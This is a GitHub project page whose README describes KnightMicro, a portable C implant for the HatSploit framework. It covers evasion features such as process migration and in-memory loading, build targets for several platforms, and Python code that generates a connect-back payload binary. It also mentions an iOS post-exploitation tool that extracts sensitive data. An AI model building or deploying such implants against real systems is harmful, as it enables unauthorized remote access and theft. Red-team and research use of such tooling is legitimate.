https://github.com/byt3n33dl3/knightmicro
Empire Implementation of advanced meterpreter payloads.
Science Score: 13.0%
This score indicates how likely this project is to be science-related based on various indicators:
- ○ CITATION.cff file
- ✓ codemeta.json file: Found codemeta.json file
- ○ .zenodo.json file
- ○ DOI references
- ○ Academic publication links
- ○ Academic email domains
- ○ Institutional organization owner
- ○ JOSS paper metadata
- ○ Scientific vocabulary similarity: Low similarity (10.5%) to scientific vocabulary
Repository
Statistics
- Stars: 3
- Watchers: 1
- Forks: 1
- Open Issues: 0
- Releases: 1
README.md
Friendly like a Pony
KnightMicro is an implementation of an advanced payload written in pure C and designed for portability and extensibility.
This repository contains KnightMicro, which is supposed to work on MacOS, Linux, Windows and iOS, but can be ported to almost every POSIX system. KnightMicro is optimized to work with or without HatSploit Framework.
Features
- Portable C code that can be compiled for a wide range of targets.
- Support for MacOS, Linux, Windows and iOS targets.
- Small executable with low resource utilization optimized for embedded systems.
- Dynamically Extendable, supports loading plugins (TABs) which extend its functionality.
- Evasion techniques such as process migration and in-memory loading.
Installing
To install KnightMicro you simply need to install HatSploit Framework and this will make KnightMicro available automatically.
```shell
pip3 install git+https://github.com/EntySec/HatSploit
```
Building
Building dependencies:
```shell
make TARGET=<target>
```
NOTE: For MacOS / iOS targets you are required to set SDK to the desired SDK path before running make. For example:
```shell
make TARGET=<target> SDK=<path>
```
The supported `TARGET` values for each platform are listed below.
Linux
- aarch64-linux-musl
- armv5l-linux-musleabi
- armv5b-linux-musleabi
- i486-linux-musl
- x86_64-linux-musl
- powerpc-linux-muslsf
- powerpc64le-linux-musl
- mips-linux-muslsf
- mipsel-linux-muslsf
- mips64-linux-musl
- s390x-linux-musl

Windows
- x86_64-w64-mingw32

MacOS / iOS
- arm-iphone-darwin
- aarch64-iphone-darwin
- i386-apple-darwin
- x86_64-apple-darwin
- aarch64-apple-darwin

Building sources:
```shell
cmake -DCMAKE_TOOLCHAIN_FILE=<toolchain> -B build
cmake --build build
```
NOTE: For MacOS / iOS targets you are required to set CMAKE_OSX_SYSROOT to the desired SDK path with -D. For example:
```shell
cmake -DCMAKE_TOOLCHAIN_FILE=<toolchain> -DCMAKE_OSX_SYSROOT=<path> -B build
```
NOTE: Toolchains are located at `toolchain/cmake/`.
These are the other cmake build options:
- `MAIN` - Should be `ON` if you want to build a source file to executable.
- `SOURCE` - Custom executable source file (defaults are in `src/main/`).
- `DEBUG` - Should be `ON` if you want to build KnightMicro in debug mode.
- `BUNDLE` - Build as bundle (macOS specific flag, adds `-bundle`).
Basic usage
To use KnightMicro and build payloads you should import it to your source.
```python3
from KnightMicro import KnightMicro
from KnightMicro.session import KnightMicroSession
```
- `KnightMicro` - KnightMicro object that is used to generate the payload implant.
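```python3
from KnightMicro import KnightMicro

# Use a separate name for the instance so the class is not shadowed.
implant = KnightMicro(
    target='aarch64-apple-darwin',
    options={
        'uri': 'tcp://127.0.0.1:8888'
    }
)

# Write the generated binary to disk.
with open('payload.exe', 'wb') as f:
    f.write(implant.to_binary())
```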
- `KnightMicroSession` - Wrapper for `HatSploitSession` for KnightMicro; HatSploit should use it with the KnightMicro payload. It can also be used without HatSploit, as demonstrated in `examples/listener.py`.
Projects
- SeaShell Framework - iOS post-exploitation framework that enables you to access the device remotely, control it and extract sensitive information. SeaShell actively uses KnightMicro implant to communicate with iOS.
Caveats
The code provided in this repository has not yet been prepared for use in a production environment. It can be improved, so any contribution is welcome. You may even experience memory leaks, so we will gladly accept any PR that fixes a potential issue.
Thanks To
- EntySec
Owner
- Name: Sulaiman
- Login: byt3n33dl3
- Kind: user
- Location: Error 403: Not on earth
- Website: https://byt3n33dl3.substack.com/
- Twitter: byt3n33dl3
- Repositories: 91
- Profile: https://github.com/byt3n33dl3
I N F R A X 8 6
GitHub Events
Total
- Watch event: 1
Last Year
- Watch event: 1
Issues and Pull Requests
Last synced: 10 months ago
All Time
- Total issues: 0
- Total pull requests: 0
- Average time to close issues: N/A
- Average time to close pull requests: N/A
- Total issue authors: 0
- Total pull request authors: 0
- Average comments per issue: 0
- Average comments per pull request: 0
- Merged pull requests: 0
- Bot issues: 0
- Bot pull requests: 0
Past Year
- Issues: 0
- Pull requests: 0
- Average time to close issues: N/A
- Average time to close pull requests: N/A
- Issue authors: 0
- Pull request authors: 0
- Average comments per issue: 0
- Average comments per pull request: 0
- Merged pull requests: 0
- Bot issues: 0
- Bot pull requests: 0
Dependencies
- pex *